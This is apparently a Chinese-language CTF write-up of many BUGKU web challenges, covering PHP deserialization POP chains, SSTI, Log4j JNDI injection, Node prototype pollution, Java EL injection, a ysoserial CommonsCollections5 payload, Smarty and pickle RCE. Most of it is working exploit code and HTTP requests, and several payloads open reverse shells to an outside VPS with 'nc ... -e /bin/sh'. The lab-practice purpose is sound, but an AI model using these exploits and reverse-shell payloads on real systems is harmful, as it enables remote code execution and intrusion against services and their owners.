} else {
print ( "Welcome 2023!!!!!" );
}
}
}
if ( isset ( $_GET [ 'pop' ])) {
$a = unserialize ( $_GET [ 'pop' ]);
} else {
echo "过新年啊~过个吉祥年~" ;
}
?> 过新年啊~过个吉祥年~
终于来了pop链
1
Year::destruct->Year::firecrackers->Rabbit::set->Year::get->Nevv::invoke->Happy::call->getshell
写exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<? php
class Happy {
public $cmd ;
public $content ;
}
class Nevv {
public $happiness ;
}
class Rabbit {
public $aspiration ;
}
class Year {
public $key ;
public $rabbit ;
}
$a = new Year ();
$a -> key = "happy new year" ;
$a -> rabbit = new Rabbit ();
$a -> rabbit -> aspiration = new Year ();
$a -> rabbit -> aspiration -> rabbit = new Nevv ();
$a -> rabbit -> aspiration -> rabbit -> happiness = new Happy ();
$a -> rabbit -> aspiration -> rabbit -> happiness -> cmd = "system" ;
$a -> rabbit -> aspiration -> rabbit -> happiness -> content = "whoami" ;
echo serialize ( $a );
但是这样子肯定打不通,因为是private
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<? php
class Happy {
private $cmd ;
private $content ;
public function __construct ( $cmd , $content )
{
$this -> cmd = $cmd ;
$this -> content = $content ;
}
}
class Nevv {
private $happiness ;
public function __construct ( $happiness ){
$this -> happiness = $happiness ;
}
}
class Rabbit {
private $aspiration ;
public function __construct ( $aspiration ){
$this -> aspiration = $aspiration ;
}
}
class Year {
public $key = "happy new year" ;
public $rabbit ;
}
$b = new Year ();
$c = new Rabbit ( $b );
$e = new Happy ( "system" , "tac /flag" );
$d = new Nevv ( $e );
$a = new Year ();
$a -> rabbit = $c ;
$b -> rabbit = $d ;
echo urlencode ( serialize ( $a ));
这样子就可以了,还是第一次写这种,之前我都是用replace正向替换的
unserialize-Noteasy 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
<? php
if ( isset ( $_GET [ 'p' ])) {
$p = unserialize ( $_GET [ 'p' ]);
}
show_source ( "index.php" );
class Noteasy
{
private $a ;
private $b ;
public function __construct ( $a , $b )
{
$this -> a = $a ;
$this -> b = $b ;
$this -> check ( $a . $b );
eval ( $a . $b );
}
public function __destruct ()
{
$a = ( string ) $this -> a ;
$b = ( string ) $this -> b ;
$this -> check ( $a . $b );
$a ( "" , $b );
}
private function check ( $str )
{
if ( preg_match_all ( "(ls|find|cat|grep|head|tail|echo)" , $str ) > 0 ) die ( "You are a hacker, get out" );
}
public function setAB ( $a , $b )
{
$this -> a = $a ;
$this -> b = $b ;
}
}
这看着就像是create_function注入
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<? php
class Noteasy
{
private $a ;
private $b ;
public function __construct ( $a , $b )
{
$this -> a = $a ;
$this -> b = $b ;
}
}
// $a=new Noteasy("create_function",";}system('l\s');/*");
$a = new Noteasy ( "create_function" , ";}system('tac flag');/*" );
echo urlencode ( serialize ( $a ));
Simple_SSTI_2 1
http://114.67.175.224:12259/?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}
闪电十六鞭 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<? php
error_reporting ( 0 );
require __DIR__ . '/flag.php' ;
$exam = 'return\'' . sha1 ( time ()) . '\';' ;
if ( ! isset ( $_GET [ 'flag' ])) {
echo '<a href="./?flag=' . $exam . '">Click here</a>' ;
}
else if ( strlen ( $_GET [ 'flag' ]) != strlen ( $exam )) {
echo '长度不允许' ;
}
else if ( preg_match ( '/`|"|\.|\\\\|\(|\)|\[|\]|_|flag|echo|print|require|include|die|exit/is' , $_GET [ 'flag' ])) {
echo '关键字不允许' ;
}
else if ( eval ( $_GET [ 'flag' ]) === sha1 ( $flag )) {
echo $flag ;
}
else {
echo '马老师发生甚么事了' ;
}
echo '<hr>' ;
highlight_file ( __FILE__ );
1
2
3
<? php
$exam = 'return\'' . sha1 ( time ()) . '\';' ;
var_dump ( $exam );
得到是49位
我们先绕过关键字
1
flag=$a='fla9';$a[3]='g';
然后再用自定义字符来绕过哈希,其中别忘了闭合eval
1
http://114.67.175.224:11972/?flag=$a='fla1';$a{3}='g';?><?=$$a;?>111111111111111111
安慰奖 先看源码,然后扫描拿到源码index.php.bak
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<? php
header ( "Content-Type: text/html;charset=utf-8" );
error_reporting ( 0 );
echo "<!-- YmFja3Vwcw== -->" ;
class ctf
{
protected $username = 'hack' ;
protected $cmd = 'NULL' ;
public function __construct ( $username , $cmd )
{
$this -> username = $username ;
$this -> cmd = $cmd ;
}
function __wakeup ()
{
$this -> username = 'guest' ;
}
function __destruct ()
{
if ( preg_match ( "/cat|more|tail|less|head|curl|nc|strings|sort|echo/i" , $this -> cmd ))
{
exit ( '</br>flag能让你这么容易拿到吗?<br>' );
}
if ( $this -> username === 'admin' )
{
// echo "<br>right!<br>";
$a = `$this->cmd` ;
var_dump ( $a );
} else
{
echo "</br>给你个安慰奖吧,hhh!</br>" ;
die ();
}
}
}
$select = $_GET [ 'code' ];
$res = unserialize ( @ $select );
?>
只需要绕过一下wakeup就好了
1
2
3
4
5
6
7
8
9
10
11
12
13
<? php
class ctf
{
protected $username ;
protected $cmd ;
public function __construct ( $cmd , $username ){
$this -> cmd = $cmd ;
$this -> username = $username ;
}
}
$a = new ctf ( 'ls' , 'admin' );
# echo serialize($a);
echo urlencode ( serialize ( $a ));
1
http://114.67.175.224:18318/?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22%00%2A%00cmd%22%3Bs%3A6%3A%22tac+f%2A%22%3B%7D
decrypt 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<? php
$key = md5 ( 'ISCC' );
$x = 0 ;
$base64_str = 'fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=' ;
$data = base64_decode ( $base64_str );
$len = strlen ( $data );
$char = '' ;
$str = '' ;
$klen = strlen ( $key );
for ( $i = 0 ; $i < $len ; $i ++ ) {
if ( $x == $klen )
{
$x = 0 ;
}
$char .= $key [ $x ];
$x += 1 ;
}
for ( $i = 0 ; $i < $len ; $i ++ ) {
if ( ord ( $data [ $i ]) > ord ( $char [ $i ])) {
$str .= chr ( ord ( $data [ $i ]) - ord ( $char [ $i ]));
}
else {
$str .= chr ( 128 + ord ( $data [ $i ]) - ord ( $char [ $i ]));
}
print ( $str . " \n " );
}
?>
Apache Log4j2 RCE 1
https://github.com/welk1n/JNDI-Injection-Exploit
1
2
3
4
5
6
7
git clone https : //github.com/welk1n/JNDI-Injection-Exploit.git
1. cd JNDI - Injection - Exploit
2. mvn clean package - DskipTests
3. java - jar target / JNDI - Injection - Exploit - 1.0 - SNAPSHOT - all . jar - C "命令" - A "VPS_IP"
java - jar target / JNDI - Injection - Exploit - 1.0 - SNAPSHOT - all . jar - C "nc 156.238.233.93 9999 -e /bin/sh" - A "156.238.233.93"
中途我的mvn配置文件还不对,搞好一会儿
先用bp的DNSLOG进行探测一下
1
${jndi:ldap://roj1ec4qvt9q7rfcigcrnaen9ef43t.oastify.com}
说明存在
1
2
3
$ { jndi :[ 攻击 payload ]}
$ { jndi : ldap : // 156.238 . 233.93 : 1389 / ujydjs }
用户名或密码错误,次数 87
一直弹不上,有没有师傅弹上的评论区娇娇
摇人了,找了Anyyy 师傅,这里说的要在vps上面进行
1
2
3
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "nc 156.238.233.93 9999 -e /bin/sh" -A "156.238.233.93"
${jndi:ldap://156.238.233.93:1389/gykkfc}
成功了
newphp 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
<? php
// php版本:5.4.44
header ( "Content-type: text/html; charset=utf-8" );
highlight_file ( __FILE__ );
class evil {
public $hint ;
public function __construct ( $hint ){
$this -> hint = $hint ;
}
public function __destruct (){
if ( $this -> hint === "hint.php" )
@ $this -> hint = base64_encode ( file_get_contents ( $this -> hint ));
var_dump ( $this -> hint );
}
function __wakeup () {
if ( $this -> hint != "╭(●`∀´●)╯" ) {
//There's a hint in ./hint.php
$this -> hint = "╰(●’◡’●)╮" ;
}
}
}
class User
{
public $username ;
public $password ;
public function __construct ( $username , $password ){
$this -> username = $username ;
$this -> password = $password ;
}
}
function write ( $data ){
global $tmp ;
$data = str_replace ( chr ( 0 ) . '*' . chr ( 0 ), '\0\0\0' , $data );
$tmp = $data ;
}
function read (){
global $tmp ;
$data = $tmp ;
$r = str_replace ( '\0\0\0' , chr ( 0 ) . '*' . chr ( 0 ), $data );
return $r ;
}
$tmp = "test" ;
$username = $_POST [ 'username' ];
$password = $_POST [ 'password' ];
$a = serialize ( new User ( $username , $password ));
if ( preg_match ( '/flag/is' , $a ))
die ( "NoNoNo!" );
unserialize ( read ( write ( $a )));
字符逃逸这里每次能逃逸三个字符,现在就是利用反序列化去得到hint
1
2
3
4
5
6
<? php
class evil {
public $hint = 'hint.php' ;
}
$a = new evil ();
echo serialize ( $a );
先这么写出来,稍微修改一下源码看看怎么替换的
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
<? php
// php版本:5.4.44
header ( "Content-type: text/html; charset=utf-8" );
highlight_file ( __FILE__ );
class evil {
public $hint ;
public function __construct ( $hint ){
$this -> hint = $hint ;
}
public function __destruct (){
if ( $this -> hint === "hint.php" )
@ $this -> hint = base64_encode ( file_get_contents ( $this -> hint ));
var_dump ( $this -> hint );
}
function __wakeup () {
if ( $this -> hint != "╭(●`∀´●)╯" ) {
//There's a hint in ./hint.php
$this -> hint = "╰(●’◡’●)╮" ;
}
}
}
class User
{
public $username ;
public $password ;
public function __construct ( $username , $password ){
$this -> username = $username ;
$this -> password = $password ;
}
}
function write ( $data ){
global $tmp ;
$data = str_replace ( chr ( 0 ) . '*' . chr ( 0 ), '\0\0\0' , $data );
$tmp = $data ;
}
function read (){
global $tmp ;
$data = $tmp ;
$r = str_replace ( '\0\0\0' , chr ( 0 ) . '*' . chr ( 0 ), $data );
return $r ;
}
$tmp = "test" ;
$username = $_POST [ 'username' ];
$password = $_POST [ 'password' ];
$a = serialize ( new User ( $username , $password ));
echo $a . " \n\n " ;
if ( preg_match ( '/flag/is' , $a ))
die ( "NoNoNo!" );
unserialize ( read ( write ( $a )));
$b = read ( write ( $a ));
echo $b ;
/*
O : 4 : "User" : 2 : { s : 8 : "username" ; s : 6 : " \0\0\0 " ; s : 8 : "password" ; s : 41 : "O:4:" evil ":1:{s:4:" hint ";s:8:" hint . php ";}" ;}
O : 4 : "User" : 2 : { s : 8 : "username" ; s : 6 : "*" ; s : 8 : "password" ; s : 41 : "O:4:" evil ":1:{s:4:" hint ";s:8:" hint . php ";}" ;}
1
2
";s:8:"password";s:41:
# 这里是22个字符
为了补齐,我们慢慢调试
1
2
3
4
O:4:"User":2:{s:8:"username";s:6:"*";s:8:"password";s:44:"1";O:4:"evil":2:{s:4:"hint";s:8:"hint.php";}";}
";s:8:"password";s:44:"1
# 这里就是24个字符了
1
username=\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0&password=1";O:4:"evil":2:{s:4:"hint";s:8:"hint.php";}
1
2
3
<? php
$hint = "index.cgi" ;
// You can't see me~
到了这里发现可以任意文件读取,只不过需要我们%0a命令执行一下
1
http://114.67.175.224:13015/index.cgi?name=%0afile:///flag
sodirty 这里扫描拿到源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
var express = require ( 'express' );
const setFn = require ( 'set-value' );
var router = express . Router ();
const Admin = {
"password" : process . env . password ? process . env . password : "password"
}
router . post ( "/getflag" , function ( req , res , next ) {
if ( req . body . password === undefined || req . body . password === req . session . challenger . password ){
res . send ( "登录失败" );
} else {
if ( req . session . challenger . age > 79 ){
res . send ( "糟老头子坏滴很" );
}
let key = req . body . key . toString ();
let password = req . body . password . toString ();
if ( Admin [ key ] === password ){
res . send ( process . env . flag ? process . env . flag : "flag{test}" );
} else {
res . send ( "密码错误,请使用管理员用户名登录." );
}
}
});
router . get ( '/reg' , function ( req , res , next ) {
req . session . challenger = {
"username" : "user" ,
"password" : "pass" ,
"age" : 80
}
res . send ( "用户创建成功!" );
});
router . get ( '/' , function ( req , res , next ) {
res . redirect ( 'index' );
});
router . get ( '/index' , function ( req , res , next ) {
res . send ( '<title>BUGKU-登录</title><h1>前端被炒了<br><br><br><a href="./reg">注册</a>' );
});
router . post ( "/update" , function ( req , res , next ) {
if ( req . session . challenger === undefined ){
res . redirect ( '/reg' );
} else {
if ( req . body . attrkey === undefined || req . body . attrval === undefined ) {
res . send ( "传参有误" );
} else {
let key = req . body . attrkey . toString ();
let value = req . body . attrval . toString ();
setFn ( req . session . challenger , key , value );
res . send ( "修改成功" );
}
}
});
module . exports = router ;
一进来看到set-value
可以能行污染,这里我们先污染age再污染密码,这里写exp,手动污染一直不成功
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import requests
s = requests . Session ()
url = "http://114.67.175.224:16250/"
def reg ( url ):
url = url + "reg"
r = s . get ( url )
print ( r . text )
def update ( url , data ):
url = url + "update"
r = s . post ( url , data = data )
print ( r . text )
def getflag ( url , data ):
url = url + "getflag"
r = s . post ( url , data = data )
print ( r . text )
reg ( url )
data = { "attrkey" : "age" , "attrval" : "18" }
update ( url , data )
data = { "attrkey" : "__proto__.pwd" , "attrval" : "wi" }
update ( url , data )
data = { "password" : "wi" , "key" : "pwd" }
getflag ( url , data )
诶有师傅可能会像我一样想着最后两步是怎么回事,代码看看就知道了
Java EL表达式注入 进来之后抓包得到source.zip
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /updateSysSetting HTTP / 1.1
Host : 114.67.175.224:14902
Content-Length : 93
X-Requested-With : XMLHttpRequest
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept : application/json, text/javascript, */*; q=0.01
Content-Type : application/json;charset=UTF-8
Origin : http://114.67.175.224:14902
Referer : http://114.67.175.224:14902/system-base.html
Accept-Encoding : gzip, deflate
Accept-Language : zh-CN,zh;q=0.9,en;q=0.8
Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; _ga=GA1.1.1320821268.1731844587; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; PHPSESSID=uukfhesjl5h1t0mvdch88ome03; flag=flag%7B67e7bb4eb5eee5456d01992aeb60ac21%7D; BUGKU=s:13:"ctf.bugku.com"; connect.sid=s%3A478RrwhL0Ye-o8q96b9ULtxrdrs6WqLv.7ispJfiYcU6CmcvWVtS7DmyGugH6nAz44mGI%2BPEuYMA; Hm_lvt_080836300300be57b7f34f4b3e97d911=1731934744; HMACCOUNT=405D29F9AFFEA4E6; Hm_lpvt_080836300300be57b7f34f4b3e97d911=1731934972
Connection : close
{ "exp" : "['115.195.167.159','115.195.167.159','164.90.230.201', '174.87.232.68']" , "limit" : "6" }
OK那弹shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
POST /updateSysSetting HTTP / 1.1
Host : 114.67.175.224:14902
Content-Length : 239
X-Requested-With : XMLHttpRequest
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept : application/json, text/javascript, */*; q=0.01
Content-Type : application/json;charset=UTF-8
Origin : http://114.67.175.224:14902
Referer : http://114.67.175.224:14902/system-base.html
Accept-Encoding : gzip, deflate
Accept-Language : zh-CN,zh;q=0.9,en;q=0.8
Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; _ga=GA1.1.1320821268.1731844587; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; PHPSESSID=uukfhesjl5h1t0mvdch88ome03; flag=flag%7B67e7bb4eb5eee5456d01992aeb60ac21%7D; BUGKU=s:13:"ctf.bugku.com"; connect.sid=s%3A478RrwhL0Ye-o8q96b9ULtxrdrs6WqLv.7ispJfiYcU6CmcvWVtS7DmyGugH6nAz44mGI%2BPEuYMA; Hm_lvt_080836300300be57b7f34f4b3e97d911=1731934744; HMACCOUNT=405D29F9AFFEA4E6; Hm_lpvt_080836300300be57b7f34f4b3e97d911=1731934972
Connection : close
{
"exp" : "''.getClass().forName('java.lang.Run'+'time').getMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Run'+'time').getMethod('getRu'+'ntime').invoke(null),'nc 156.238.233.93 9999 -e /bin/sh'))" ,
"limit" : "60"
}
ez_java_serialize 打CC5的链子
1
2
3
4
5
java -jar ysoserial.jar CommonsCollections5 "nc 156.238.233.93 9999 -e /bin/bash" |base64 -w0 >poc.bin
scp E:\javaexp\ysoserial.jar root@156.238.233.93:/root/
scp E:\javaexp\JNDI-Injection-Exploit\target\JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar root@156.238.233.93:/root/
然后我们发包
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POST /hello HTTP / 1.1
Host : 114.67.175.224:16818
Content-Length : 2735
Pragma : no-cache
Cache-Control : no-cache
Origin : http://114.67.175.224:16818
Content-Type : application/x-www-form-urlencoded
Upgrade-Insecure-Requests : 1
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer : http://114.67.175.224:16818/hello
Accept-Encoding : gzip, deflate
Accept-Language : zh-CN,zh;q=0.9,en;q=0.8
Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; _ga=GA1.1.1320821268.1731844587; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; PHPSESSID=uukfhesjl5h1t0mvdch88ome03; flag=flag%7B67e7bb4eb5eee5456d01992aeb60ac21%7D; BUGKU=s:13:"ctf.bugku.com"; connect.sid=s%3A478RrwhL0Ye-o8q96b9ULtxrdrs6WqLv.7ispJfiYcU6CmcvWVtS7DmyGugH6nAz44mGI%2BPEuYMA; Hm_lvt_080836300300be57b7f34f4b3e97d911=1731934744; HMACCOUNT=405D29F9AFFEA4E6; Hm_lpvt_080836300300be57b7f34f4b3e97d911=1731935015
Connection : close
name=rO0ABXNyAC5qYXZheC5tYW5hZ2VtZW50LkJhZEF0dHJpYnV0ZVZhbHVlRXhwRXhjZXB0aW9u1Ofaq2MtRkACAAFMAAN2YWx0ABJMamF2YS9sYW5nL09iamVjdDt4cgATamF2YS5sYW5nLkV4Y2VwdGlvbtD9Hz4aOxzEAgAAeHIAE2phdmEubGFuZy5UaHJvd2FibGXVxjUnOXe4ywMABEwABWNhdXNldAAVTGphdmEvbGFuZy9UaHJvd2FibGU7TAANZGV0YWlsTWVzc2FnZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sACnN0YWNrVHJhY2V0AB5bTGphdmEvbGFuZy9TdGFja1RyYWNlRWxlbWVudDtMABRzdXBwcmVzc2VkRXhjZXB0aW9uc3QAEExqYXZhL3V0aWwvTGlzdDt4cHEAfgAIcHVyAB5bTGphdmEubGFuZy5TdGFja1RyYWNlRWxlbWVudDsCRio8PP0iOQIAAHhwAAAAA3NyABtqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnRhCcWaJjbdhQIACEIABmZvcm1hdEkACmxpbmVOdW1iZXJMAA9jbGFzc0xvYWRlck5hbWVxAH4ABUwADmRlY2xhcmluZ0NsYXNzcQB%2BAAVMAAhmaWxlTmFtZXEAfgAFTAAKbWV0aG9kTmFtZXEAfgAFTAAKbW9kdWxlTmFtZXEAfgAFTAANbW9kdWxlVmVyc2lvbnEAfgAFeHABAAAAUXQAA2FwcHQAJnlzb3NlcmlhbC5wYXlsb2Fkcy5Db21tb25zQ29sbGVjdGlvbnM1dAAYQ29tbW9uc0NvbGxlY3Rpb25zNS5qYXZhdAAJZ2V0T2JqZWN0cHBzcQB%2BAAsBAAAAM3EAfgANcQB%2BAA5xAH4AD3EAfgAQcHBzcQB%2BAAsBAAAAInEAfgANdAAZeXNvc2VyaWFsLkdlbmVyYXRlUGF5bG9hZHQAFEdlbmVyYXRlUGF5bG9hZC5qYXZhdAAEbWFpbnBwc3IAH2phdmEudXRpbC5Db2xsZWN0aW9ucyRFbXB0eUxpc3R6uBe0PKee3gIAAHhweHNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXlxAH4AAUwAA21hcHQAD0xqYXZhL3V0aWwvTWFwO3hwdAADZm9vc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNoYWluZWRUcmFuc2Zvcm1lcjDHl%2BwoepcEAgABWwANaVRyYW5zZm9ybWVyc3QALVtMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwdXIALVtMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLlRyYW5zZm9ybWVyO71WKvHYNBiZAgAAeHAAAAAFc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5Db25zdGFudFRyYW5zZm9ybWVyWHaQEUECsZQCAAFMAAlpQ29uc3RhbnRxAH4AAXhwdnIAEWphdmEubGFuZy5SdW50aW1lAAAAAAAAAAAAAAB4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh%2Bj%2Fa3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXEAfgAFWwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJ0AApnZXRSdW50aW1ldXIAEltMamF2YS5sYW5nLkNsYXNzO6sW167LzVqZAgAAeHAAAAAAdAAJZ2V0TWV0aG9kdXEAfgAvAAAAAnZyABBqYXZhLmxhbmcuU3RyaW5noPCkOHo7s0ICAAB4cHZxAH4AL3NxAH4AKHVxAH4ALAAAAAJwdXEAfgAsAAAAAHQABmludm9rZXVxAH4ALwAAAAJ2cgAQamF2YS5sYW5nLk9iamVjdAAAAAAAAAAAAAAAeHB2cQB%2BACxzcQB%2BACh1cgATW0xqYXZhLmxhbmcuU3RyaW5nO63SVufpHXtHAgAAeHAAAAABdAAjbmMgMTU2LjIzOC4yMzMuOTMgOTk5OSAtZSAvYmluL2Jhc2h0AARleGVjdXEAfgAvAAAAAXEAfgA0c3EAfgAkc3IAEWphdmEubGFuZy5JbnRlZ2VyEuKgpPeBhzgCAAFJAAV2YWx1ZXhyABBqYXZhLmxhbmcuTnVtYmVyhqyVHQuU4IsCAAB4cAAAAAFzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHh4
这里要进行编码不然二进制,别人看不懂,所以不认
聪明的php 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
include ( './libs/Smarty.class.php' );
echo "pass a parameter and maybe the flag file's filename is random :>" ;
$smarty = new Smarty ();
if ( $_GET ){
highlight_file ( 'index.php' );
foreach ( $_GET AS $key => $value )
{
print $key . " \n " ;
if ( preg_match ( "/flag|\/flag/i" , $value )){
$smarty -> display ( './template.html' );
} elseif ( preg_match ( "/system|readfile|gz|exec|eval|cat|assert|file|fgets/i" , $value )){
$smarty -> display ( './template.html' );
} else {
$smarty -> display ( "eval:" . $value );
}
}
}
?>
Smarty框架,使用这个姿势RCE
1
2
3
{if phpinfo()}{/if}
{if%20passthru('tac /_5510')}{/if}
Python Pickle Unserializer 扫描出source
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
import pickle
import base64
from flask import Flask , request
app = Flask ( __name__ )
@app.route ( "/" , methods = [ "GET" ])
def index ():
return """
Not Found
The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.
""" , 666 , [( "TIPS" , "/source" )]
@app.route ( "/source" , methods = [ "GET" ])
def source ():
with open ( __file__ , "r" ) as fp :
return fp . read ()
@app.route ( "/flag" , methods = [ "PUT" ])
def get_flag ():
try :
data = request . json
if data :
return pickle . loads ( base64 . b64decode ( data [ "payload" ]))
return "MISSED"
except :
return "OH NO!!!"
if __name__ == '__main__' :
app . run ( host = "0.0.0.0" , port = 80 )
pickle反序列化,弹shell或者RCE
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
import base64
import pickle
import subprocess
import httpx
class A :
def __reduce__ ( self ):
s = '''
import subprocess
r = subprocess.run(
'cat flag',
shell=True,
check=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
print(r.stdout.decode())
'''
return ( subprocess . check_output , ([ "python3" , "-c" , s ],))
a = A ()
data = {
'payload' : base64 . b64encode ( pickle . dumps ( a )) . decode ()
}
a = base64 . b64decode ( data [ 'payload' ])
r = httpx . put ( 'http://114.67.175.224:13379/flag' , json = data )
print ( f 'r: { r . text } ' )
CaaS1 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/usr/bin/env python3
from flask import Flask , request , render_template , render_template_string , redirect
import subprocess
import urllib
app = Flask ( __name__ )
def blacklist ( inp ):
blacklist = [ 'mro' , 'url' , 'join' , 'attr' , 'dict' , '()' , 'init' , 'import' , 'os' , 'system' , 'lipsum' , 'current_app' , 'globals' , 'subclasses' , '|' , 'getitem' , 'popen' , 'read' , 'ls' , 'flag.txt' , 'cycler' , '[]' , '0' , '1' , '2' , '3' , '4' , '5' , '6' , '7' , '8' , '9' , '=' , '+' , ':' , 'update' , 'config' , 'self' , 'class' , '%' , '#' ]
for b in blacklist :
if b in inp :
return "Blacklisted word!"
if len ( inp ) <= 70 :
return inp
if len ( inp ) > 70 :
return "Input too long!"
@app.route ( '/' )
def main ():
return redirect ( '/generate' )
@app.route ( '/generate' , methods = [ 'GET' , 'POST' ])
def generate_certificate ():
if request . method == 'GET' :
return render_template ( 'generate_certificate.html' )
elif request . method == 'POST' :
name = blacklist ( request . values [ 'name' ])
teamname = request . values [ 'team_name' ]
return render_template_string ( f '<p>Haha! No certificate for { name } </p>' )
if __name__ == '__main__' :
app . run ( host = '0.0.0.0' , port = 80 )
这里明明是可以直接RCE的
1
2
3
http://114.67.175.224:13324/generate?x=__import__('os').popen('tac flag.txt').read()
POST:
name={{g.pop["__global""s__"].__builtins__.eval(request.args.x)}}&team_name=g
noteasytrick 明天做
我来了,今天修评论用了很多时间,现在来做一下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<? php
error_reporting ( 0 );
ini_set ( "display_errors" , "Off" );
class Jesen {
public $filename ;
public $content ;
public $me ;
function __wakeup (){
$this -> me = new Ctf ();
}
function __destruct () {
$this -> me -> open ( $this -> filename , $this -> content );
}
}
class Ctf {
function __toString () {
return "die" ;
}
function open ( $filename , $content ){
if ( ! file_get_contents ( "./sandbox/lock.lock" )){
echo file_get_contents ( substr ( $_POST [ 'b' ], 0 , 30 ));
die ();
} else {
file_put_contents ( "./sandbox/" . md5 ( $filename . time ()), $content );
die ( "or you can guess the final filename?" );
}
}
}
if ( ! isset ( $_POST [ 'a' ])){
highlight_file ( __FILE__ );
die ();
} else {
if (( $_POST [ 'b' ] != $_POST [ 'a' ]) && ( md5 ( $_POST [ 'b' ]) === md5 ( $_POST [ 'a' ]))){
unserialize ( $_POST [ 'c' ]);
}
}
进来就有源码,这里我们先绕过wakeup先删除./sandbox/lock.lock,然后就可以利用文件进行flag的读取
